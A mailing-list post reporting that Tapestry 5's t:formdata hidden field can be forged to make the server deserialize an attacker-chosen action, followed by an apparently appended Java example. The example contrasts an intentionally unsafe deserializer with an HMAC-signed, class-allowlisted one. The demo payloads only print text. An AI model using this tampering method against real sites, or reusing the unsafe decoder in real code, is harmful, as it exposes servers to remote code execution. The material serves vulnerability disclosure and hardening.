Hi,
These days I keep thinking about the security of t:formdata. Just now I ran a test
to hack t:formdata and found that there is some serious damage.
1. First I changed the source code of the Form component to store a component action
in Form, and built my own tapestry-core.jar.
    // Action stored in the Form's t:formdata; it runs when the form data is deserialized.
    static final ComponentAction<Form> TEST_ACTION = new ComponentAction<Form>()
    {
        private static final long serialVersionUID = 0L;

        public void execute(Form component)
        {
            for (int i = 0; i < 1000; i++)
            {
                System.out.println("-----run " + i);
            }
        }

        @Override
        public String toString()
        {
            return "TEST_ACTION";
        }
    };
2. jetty:run the application with my own jar and access a page (/login) that
contains a form, then get the t:formdata from the HTML source.
3. Revert to the official jar, and create a new AbstractIntegrationTestSuite test case:
    open("login");
    type("t:formdata", /* paste the form data copied in step 2 */);
    clickAndWait(submit);
Test result: I can see "-----run 0" to "-----run 1000" logged.
So in my understanding, doesn't it mean that a website based on Tapestry 5 is
not very secure and can be attacked by any experienced T5 programmer?
Thanks,
DH
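The test above shows the server deserializing whatever bytes the client puts in the t:formdata hidden field. The mechanism is plain Java serialization: t:formdata is a Base64-encoded object stream, so the attacker only needs a serializable class the server can load, not a rebuilt tapestry-core.jar. The following stand-alone example (added here; not DH's test code and not Tapestry's implementation) reproduces the unsafe decode beside a hardened one that verifies an HMAC over the field before constructing an ObjectInputStream and restricts the classes the stream may resolve. EchoAction, FormDataDemo, SERVER_SECRET and the "sig:payload" field format are assumptions made for the illustration; signing the field with a server-side secret is the same idea as the tapestry.hmac-passphrase symbol introduced in later Tapestry releases.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;
import java.util.Set;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class FormDataDemo {

    // Hypothetical stand-in for the ComponentAction carried in t:formdata.
    // Its readObject runs during deserialization, before application code sees the object.
    static final class EchoAction implements Serializable {
        private static final long serialVersionUID = 1L;
        final String message;
        EchoAction(String message) { this.message = message; }
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            System.out.println("readObject ran for: " + message);
        }
    }

    // What the server writes into the hidden field: Base64 of a Java object stream.
    static String encode(Serializable action) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(action); }
        return Base64.getEncoder().encodeToString(bos.toByteArray());
    }

    // Unsafe: trusts the posted value; any loadable class is instantiated by readObject.
    static Object decodeUnsafe(String formData) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(formData);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            return ois.readObject();
        }
    }

    // Assumption: a random secret held only on the server, never sent to the client.
    static final byte[] SERVER_SECRET = "replace-with-a-random-server-secret".getBytes(StandardCharsets.UTF_8);
    // Only these classes may appear in a stream, even if the signature checks out.
    static final Set<String> ALLOWED = Set.of(EchoAction.class.getName());

    static String hmac(String payload) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(SERVER_SECRET, "HmacSHA256"));
        return Base64.getEncoder().encodeToString(mac.doFinal(payload.getBytes(StandardCharsets.UTF_8)));
    }

    // Hardened writer: field value is "signature:payload".
    static String encodeSigned(Serializable action) throws Exception {
        String payload = encode(action);
        return hmac(payload) + ":" + payload;
    }

    // Hardened reader: constant-time signature check first, then an allowlisted stream.
    static Object decodeSigned(String formData) throws Exception {
        int sep = formData.indexOf(':');
        if (sep < 0) throw new SecurityException("missing signature");
        String sig = formData.substring(0, sep);
        String payload = formData.substring(sep + 1);
        byte[] expected = hmac(payload).getBytes(StandardCharsets.UTF_8);
        byte[] got = sig.getBytes(StandardCharsets.UTF_8);
        if (!MessageDigest.isEqual(expected, got)) throw new SecurityException("bad signature");
        byte[] raw = Base64.getDecoder().decode(payload);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(raw)) {
            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if (!ALLOWED.contains(desc.getName())) {
                    throw new InvalidClassException("class not allowed: " + desc.getName());
                }
                return super.resolveClass(desc);
            }
        }) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // 1. Server renders the form; the hidden field carries a serialized action.
        String rendered = encode(new EchoAction("legit"));
        decodeUnsafe(rendered);
        // 2. Client replaces the field with a stream it serialized itself (here built in
        //    the same JVM for brevity); the unsafe decoder runs its readObject anyway.
        String forged = encode(new EchoAction("forged by client"));
        decodeUnsafe(forged);
        // 3. With a signed field, the forged stream is rejected before deserialization starts.
        decodeSigned(encodeSigned(new EchoAction("legit, signed")));
        try {
            decodeSigned("AAAA:" + forged);
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The HMAC is what actually closes the hole DH describes: without the secret, the client cannot produce a value the server will deserialize at all. The resolveClass allowlist is defense in depth for the case where the secret leaks or a signed value is replayed against a different endpoint, and MessageDigest.isEqual is used instead of String.equals so that the comparison does not leak how many leading bytes of the signature were correct.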